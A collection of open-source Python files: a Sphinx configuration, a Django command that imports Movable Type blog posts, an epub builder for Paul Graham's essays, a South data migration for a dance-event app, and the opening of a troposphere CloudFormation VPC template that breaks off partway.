# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
highlight_language = 'ruby'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'Huttedoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'Hutte.tex', 'Hutte Documentation',
'Bastien Léonard', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'hutte', 'Hutte Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'Hutte', 'Hutte Documentation',
author, 'Hutte', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# -- Options for Epub output ----------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
epub_author = author
epub_publisher = author
epub_copyright = copyright
# The basename for the epub file. It defaults to the project name.
#epub_basename = project
# The HTML theme for the epub output. Since the default themes are not optimized
# for small screen space, using the same theme for HTML and epub output is
# usually not wise. This defaults to 'epub', a theme designed to save visual
# space.
#epub_theme = 'epub'
# The language of the text. It defaults to the language option
# or 'en' if the language is not set.
#epub_language = ''
# The scheme of the identifier. Typical schemes are ISBN or URL.
#epub_scheme = ''
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#epub_identifier = ''
# A unique identification for the text.
#epub_uid = ''
# A tuple containing the cover image and cover page html template filenames.
#epub_cover = ()
# A sequence of (type, uri, title) tuples for the guide element of content.opf.
#epub_guide = ()
# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_pre_files = []
# HTML files that should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_post_files = []
# A list of files that should not be packed into the epub file.
epub_exclude_files = ['search.html']
# The depth of the table of contents in toc.ncx.
#epub_tocdepth = 3
# Allow duplicate toc entries.
#epub_tocdup = True
# Choose between 'default' and 'includehidden'.
#epub_tocscope = 'default'
# Fix unsupported image types using Pillow.
#epub_fix_images = False
# Scale large images.
#epub_max_image_width = 0
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#epub_show_urls = 'inline'
# If false, no index is generated.
#epub_use_index = True
| bastienleonard/hutte | doc/sphinx/conf.py | Python | bsd-2-clause | 11,279 |
from optparse import make_option
import os
import shutil
from django.core.management.base import BaseCommand
from django.contrib.auth.models import User
import MySQLdb
from blog.models import Blog, Post, Asset
class Command(BaseCommand):
help = 'Import blog posts from Movable Type'
option_list = BaseCommand.option_list + (
make_option('-d',
dest='database',
help='The MT database name'),
make_option('-u',
dest='user',
help='The MT database user'),
make_option('-p',
dest='password',
help='The MT database password'),
make_option('-r',
dest='root',
help='The MT root directory (for copying image files)'),
make_option('-i',
dest='src_blog_id',
help='The MT blog ID to copy'),
make_option('-b',
dest='dst_blog_id',
                    help='The Django destination blog id. Should exist.'))
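    # A hedged invocation sketch -- the command name follows from this
    # module's path (import_mt); every value below is a made-up placeholder:
    #
    #   ./manage.py import_mt -d mt_db -u mt_user -p secret \
    #       -r /var/www/movabletype -i 3 -b 1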
def handle(self, *args, **options):
blog = Blog.objects.get(id=options['dst_blog_id'])
blog.ensure_assets_directory()
db = MySQLdb.Connect(db=options['database'], user=options['user'], passwd=options['password'])
entry_cursor = db.cursor()
entry_cursor.execute('''
select e.entry_id, e.entry_basename, e.entry_modified_on, e.entry_title, e.entry_text,
a.author_basename, a.author_email, a.author_nickname
from mt_entry as e, mt_author as a
where e.entry_blog_id = %s
and e.entry_author_id = a.author_id''' % options['src_blog_id'])
        rows = list(entry_cursor)
        print rows
        for row in rows:
row = dict(zip(['id', 'basename', 'modified_on', 'title', 'body', 'username', 'email', 'first_name'], row))
print "create user %s" % row['username']
# Ensure the user exists.
try:
user = User.objects.get(username=row['username'])
except User.DoesNotExist:
user = User.objects.create_user(row['username'], row['email'])
user.first_name = row['first_name']
user.save()
# Create the blog post.
self.stdout.write('Create "%s"' % row['title'])
try:
post = Post.objects.get(blog=blog, user=user, slug=row['basename'])
except Post.DoesNotExist:
post = Post.objects.create(blog=blog,
user=user,
title=row['title'] or '<No Title>',
slug=row['basename'][:50],
pub_date=row['modified_on'],
body=row['body'])
# Create the files.
asset_cursor = db.cursor()
asset_cursor.execute('''select a.asset_file_path, a.asset_class
from mt_asset as a, mt_objectasset as oa
where oa.objectasset_object_id = %s
and oa.objectasset_blog_id = %s
and a.asset_id = oa.objectasset_asset_id''' % (row['id'], options['src_blog_id']))
for i, asset in enumerate(list(asset_cursor)):
position = i + 1
asset = dict(zip(['file_path', 'asset_class'], asset))
src_file = asset['file_path'].replace(r'%r', options['root'])
print src_file
dst_file = os.path.join(blog.assets_directory, os.path.basename(asset['file_path']))
if os.path.exists(src_file):
print src_file, "->", dst_file
shutil.copyfile(src_file, dst_file)
Asset.objects.create(post=post,
file_name=os.path.basename(dst_file),
type=asset['asset_class'],
description='',
position=position)
| nodebox/workshops | blog/management/commands/import_mt.py | Python | bsd-2-clause | 4,262 |
# -*- coding: utf-8 -*-
"""
Builds epub book out of Paul Graham's essays: http://paulgraham.com/articles.html
Author: Ola Sitarska <[email protected]>
Copyright: Licensed under the GPL-3 (http://www.gnu.org/licenses/gpl-3.0.html)
This script requires python-epub-library: http://code.google.com/p/python-epub-builder/
"""
import re, ez_epub, urllib2, genshi
#from BeautifulSoup import BeautifulSoup
from bs4 import BeautifulSoup
def addSection(link, title):
if not 'http' in link:
page = urllib2.urlopen('http://www.paulgraham.com/'+link).read()
soup = BeautifulSoup(page)
soup.prettify()
else:
page = urllib2.urlopen(link).read()
section = ez_epub.Section()
try:
section.title = title
print section.title
if not 'http' in link:
font = str(soup.findAll('table', {'width':'435'})[0].findAll('font')[0])
if not 'Get funded by' in font and not 'Watch how this essay was' in font and not 'Like to build things?' in font and not len(font)<100:
content = font
else:
content = ''
for par in soup.findAll('table', {'width':'435'})[0].findAll('p'):
content += str(par)
for p in content.split("<br /><br />"):
section.text.append(genshi.core.Markup(p))
#exception for Subject: Airbnb
for pre in soup.findAll('pre'):
section.text.append(genshi.core.Markup(pre))
else:
for p in str(page).replace("\n","<br />").split("<br /><br />"):
section.text.append(genshi.core.Markup(p))
except:
pass
return section
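# addSection fetches a single essay: relative links are resolved against
# paulgraham.com while absolute ones are used as-is. For on-site essays it
# scrapes the 435px-wide content table, skips the promo blurbs, and splits
# the body on double <br /> tags into the epub section's paragraphs.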
book = ez_epub.Book()
book.title = "Paul Graham's Essays"
book.authors = ['Paul Graham']
page = urllib2.urlopen('http://www.paulgraham.com/articles.html').read()
soup = BeautifulSoup(page)
soup.prettify()
links = soup.findAll('table', {'width': '435'})[1].findAll('a')
sections = []
for link in links:
sections.append(addSection(link['href'], link.text))
book.sections = sections
book.make(book.title)
| norayr/pgessays | pgessays.py | Python | bsd-2-clause | 2,125 |
#from shoutrequest import ShoutRequest
from djangorequest import DjangoRequest
import json
from twisted.internet import task
from twisted.internet import reactor
mb = {"requestid":"AAAAA1", "requesttype":"get", "requesttimeout":10, "requestbody":{"selects": [{"name":"sweetspot.models.Locations", "label":"L", "cols":["boroughCode", "locationCode"]}, {"name":"sweetspot.models.Signs", "label":"S", "cols":["FtFromCurb", "locationCode"]}], "joins":[{"L.locationCode":"P-004958", "op":"eq"}, {"S.FtFromCurb":"9", "op":"eq"}, {"L.boroughCode":["M","B"], "op":"in"}]}}
def runEvery5Seconds():
print shoutRequest.getResults()
decoder = json.JSONEncoder()
requestid = mb["requestid"]
requesttimeout = mb["requesttimeout"]
requestbody = mb["requestbody"]
shoutRequest = DjangoRequest(format = "JSON", requestObj = requestbody, requesttimeout = requesttimeout, requestid = requestid)
if shoutRequest.isValidRequest():
print "request is valid"
gms = shoutRequest.createGenericModels()
else:
print mb, " is not a valid request"
#l = task.LoopingCall(runEvery5Seconds)
#l.start(2)
#reactor.run()
| psiCode/shoutserver | mysite/djangorequest_test.py | Python | bsd-2-clause | 1,094 |
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
class Migration(DataMigration):
def forwards(self, orm):
"Write your forwards methods here."
# Note: Remember to use orm['appname.ModelName'] rather than "from appname.models..."
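        # Copy every ScheduledDance into a freshly created Venue, then
        # repoint the dances that referenced the old schedule at the new
        # venue record.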
ScheduledDance = orm['stepping_out.ScheduledDance']
Venue = orm['stepping_out.Venue']
for sd in ScheduledDance.objects.all():
v = Venue.objects.create(
name=sd.name,
banner=sd.banner,
description=sd.description,
website=sd.website,
weekday=sd.weekday,
weeks=sd.weeks,
dance_template=sd.dance_template
)
sd.dances.update(venue=v)
def backwards(self, orm):
"Write your backwards methods here."
ScheduledDance = orm['stepping_out.ScheduledDance']
Venue = orm['stepping_out.Venue']
for v in Venue.objects.all():
sd = ScheduledDance.objects.create(
name=v.name,
banner=v.banner,
description=v.description,
website=v.website,
weekday=v.weekday,
weeks=v.weeks,
dance_template=v.dance_template
)
v.dances.update(venue=sd)
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'stepping_out.dance': {
'Meta': {'ordering': "('start', 'end')", 'object_name': 'Dance'},
'banner': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'custom_price': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'djs': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'dj_for'", 'blank': 'True', 'through': u"orm['stepping_out.DanceDJ']", 'to': u"orm['stepping_out.Person']"}),
'end': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'hosts': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'host_for'", 'blank': 'True', 'to': u"orm['stepping_out.Person']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_canceled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'live_acts': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['stepping_out.LiveAct']", 'symmetrical': 'False', 'through': u"orm['stepping_out.DanceLiveAct']", 'blank': 'True'}),
'location': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['stepping_out.Location']", 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'price': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'scheduled_dance': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'dances'", 'null': 'True', 'to': u"orm['stepping_out.ScheduledDance']"}),
'sites': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['sites.Site']", 'symmetrical': 'False', 'blank': 'True'}),
'start': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'student_price': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'tagline': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'venue': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'dances'", 'null': 'True', 'to': u"orm['stepping_out.Venue']"})
},
u'stepping_out.dancedj': {
'Meta': {'ordering': "('order', 'start', 'end')", 'object_name': 'DanceDJ'},
'dance': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['stepping_out.Dance']"}),
'end': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'order': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['stepping_out.Person']"}),
'start': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'})
},
u'stepping_out.danceliveact': {
'Meta': {'ordering': "('order', 'start', 'end')", 'object_name': 'DanceLiveAct'},
'dance': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['stepping_out.Dance']"}),
'end': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'live_act': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['stepping_out.LiveAct']"}),
'order': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'start': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'})
},
u'stepping_out.dancetemplate': {
'Meta': {'object_name': 'DanceTemplate'},
'banner': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'custom_price': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'end_time': ('django.db.models.fields.TimeField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['stepping_out.Location']", 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'price': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'sites': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['sites.Site']", 'symmetrical': 'False', 'blank': 'True'}),
'start_time': ('django.db.models.fields.TimeField', [], {'null': 'True', 'blank': 'True'}),
'student_price': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'tagline': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'})
},
u'stepping_out.lesson': {
'Meta': {'ordering': "('start', 'end')", 'object_name': 'Lesson'},
'custom_price': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'dance': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'lessons'", 'to': u"orm['stepping_out.Dance']"}),
'dance_included': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'end': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['stepping_out.Location']", 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'price': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'start': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'student_price': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'teachers': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['stepping_out.Person']", 'symmetrical': 'False', 'blank': 'True'})
},
u'stepping_out.lessontemplate': {
'Meta': {'object_name': 'LessonTemplate'},
'custom_price': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'dance_included': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'dance_template': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'lesson_templates'", 'null': 'True', 'to': u"orm['stepping_out.DanceTemplate']"}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'end_time': ('django.db.models.fields.TimeField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['stepping_out.Location']", 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'price': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'start_time': ('django.db.models.fields.TimeField', [], {'null': 'True', 'blank': 'True'}),
'student_price': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'})
},
u'stepping_out.liveact': {
'Meta': {'object_name': 'LiveAct'},
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'stepping_out.location': {
'Meta': {'object_name': 'Location'},
'address': ('django.db.models.fields.CharField', [], {'max_length': '150'}),
'banner': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'city': ('django.db.models.fields.CharField', [], {'default': "'Seattle'", 'max_length': '100'}),
'custom_map_image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'custom_map_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'latitude': ('django.db.models.fields.FloatField', [], {}),
'longitude': ('django.db.models.fields.FloatField', [], {}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'neighborhood': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'state': ('django_localflavor_us.models.USStateField', [], {'default': "'WA'", 'max_length': '2'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
},
u'stepping_out.person': {
'Meta': {'object_name': 'Person'},
'bio': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['auth.User']", 'unique': 'True', 'null': 'True', 'blank': 'True'})
},
u'stepping_out.scheduleddance': {
'Meta': {'object_name': 'ScheduledDance'},
'banner': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'dance_template': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['stepping_out.DanceTemplate']", 'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'weekday': ('django.db.models.fields.PositiveSmallIntegerField', [], {}),
'weeks': ('django.db.models.fields.CommaSeparatedIntegerField', [], {'default': "'1,2,3,4,5'", 'max_length': '9'})
},
u'stepping_out.venue': {
'Meta': {'object_name': 'Venue'},
'banner': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'dance_template': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['stepping_out.DanceTemplate']", 'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'weekday': ('django.db.models.fields.PositiveSmallIntegerField', [], {}),
'weeks': ('django.db.models.fields.CommaSeparatedIntegerField', [], {'default': "'1,2,3,4,5'", 'max_length': '9'})
}
}
complete_apps = ['stepping_out']
symmetrical = True
| melinath/django-stepping-out | stepping_out/migrations/0016_scheduled_dance_to_venue.py | Python | bsd-2-clause | 17,560 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Converted from VPC_With_VPN_Connection.template located at:
# http://aws.amazon.com/cloudformation/aws-cloudformation-templates
from troposphere import Base64, FindInMap, GetAtt, Join, Output
from troposphere import Parameter, Ref, Tags, Template
from troposphere.autoscaling import Metadata
from troposphere.ec2 import PortRange, NetworkAcl, Route, \
VPCGatewayAttachment, SubnetRouteTableAssociation, Subnet, RouteTable, \
VPC, NetworkInterfaceProperty, NetworkAclEntry, \
SubnetNetworkAclAssociation, EIP, Instance, InternetGateway, \
SecurityGroupRule, SecurityGroup
from troposphere.policies import CreationPolicy, ResourceSignal
from troposphere.cloudformation import Init, InitFile, InitFiles, \
InitConfig, InitService, InitServices
t = Template()
t.add_version('2010-09-09')
t.set_description("""\
AWS CloudFormation Sample Template VPC_Single_Instance_In_Subnet: Sample \
template showing how to create a VPC and add an EC2 instance with an Elastic \
IP address and a security group. \
**WARNING** This template creates an Amazon EC2 instance. You will be billed \
for the AWS resources used if you create a stack from this template.""")
keyname_param = t.add_parameter(
Parameter(
'KeyName',
ConstraintDescription='must be the name of an existing EC2 KeyPair.',
Description='Name of an existing EC2 KeyPair to enable SSH access to \
the instance',
Type='AWS::EC2::KeyPair::KeyName',
))
sshlocation_param = t.add_parameter(
Parameter(
'SSHLocation',
Description=' The IP address range that can be used to SSH to the EC2 \
instances',
Type='String',
MinLength='9',
MaxLength='18',
Default='0.0.0.0/0',
AllowedPattern=r"(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})/(\d{1,2})",
ConstraintDescription=(
"must be a valid IP CIDR range of the form x.x.x.x/x."),
))
instanceType_param = t.add_parameter(Parameter(
'InstanceType',
Type='String',
Description='WebServer EC2 instance type',
Default='m1.small',
AllowedValues=[
't1.micro',
't2.micro', 't2.small', 't2.medium',
'm1.small', 'm1.medium', 'm1.large', 'm1.xlarge',
'm2.xlarge', 'm2.2xlarge', 'm2.4xlarge',
'm3.medium', 'm3.large', 'm3.xlarge', 'm3.2xlarge',
'c1.medium', 'c1.xlarge',
'c3.large', 'c3.xlarge', 'c3.2xlarge', 'c3.4xlarge', 'c3.8xlarge',
'g2.2xlarge',
'r3.large', 'r3.xlarge', 'r3.2xlarge', 'r3.4xlarge', 'r3.8xlarge',
'i2.xlarge', 'i2.2xlarge', 'i2.4xlarge', 'i2.8xlarge',
'hi1.4xlarge',
'hs1.8xlarge',
'cr1.8xlarge',
'cc2.8xlarge',
'cg1.4xlarge',
],
ConstraintDescription='must be a valid EC2 instance type.',
))
t.add_mapping('AWSInstanceType2Arch', {
't1.micro': {'Arch': 'PV64'},
't2.micro': {'Arch': 'HVM64'},
't2.small': {'Arch': 'HVM64'},
't2.medium': {'Arch': 'HVM64'},
'm1.small': {'Arch': 'PV64'},
'm1.medium': {'Arch': 'PV64'},
'm1.large': {'Arch': 'PV64'},
'm1.xlarge': {'Arch': 'PV64'},
'm2.xlarge': {'Arch': 'PV64'},
'm2.2xlarge': {'Arch': 'PV64'},
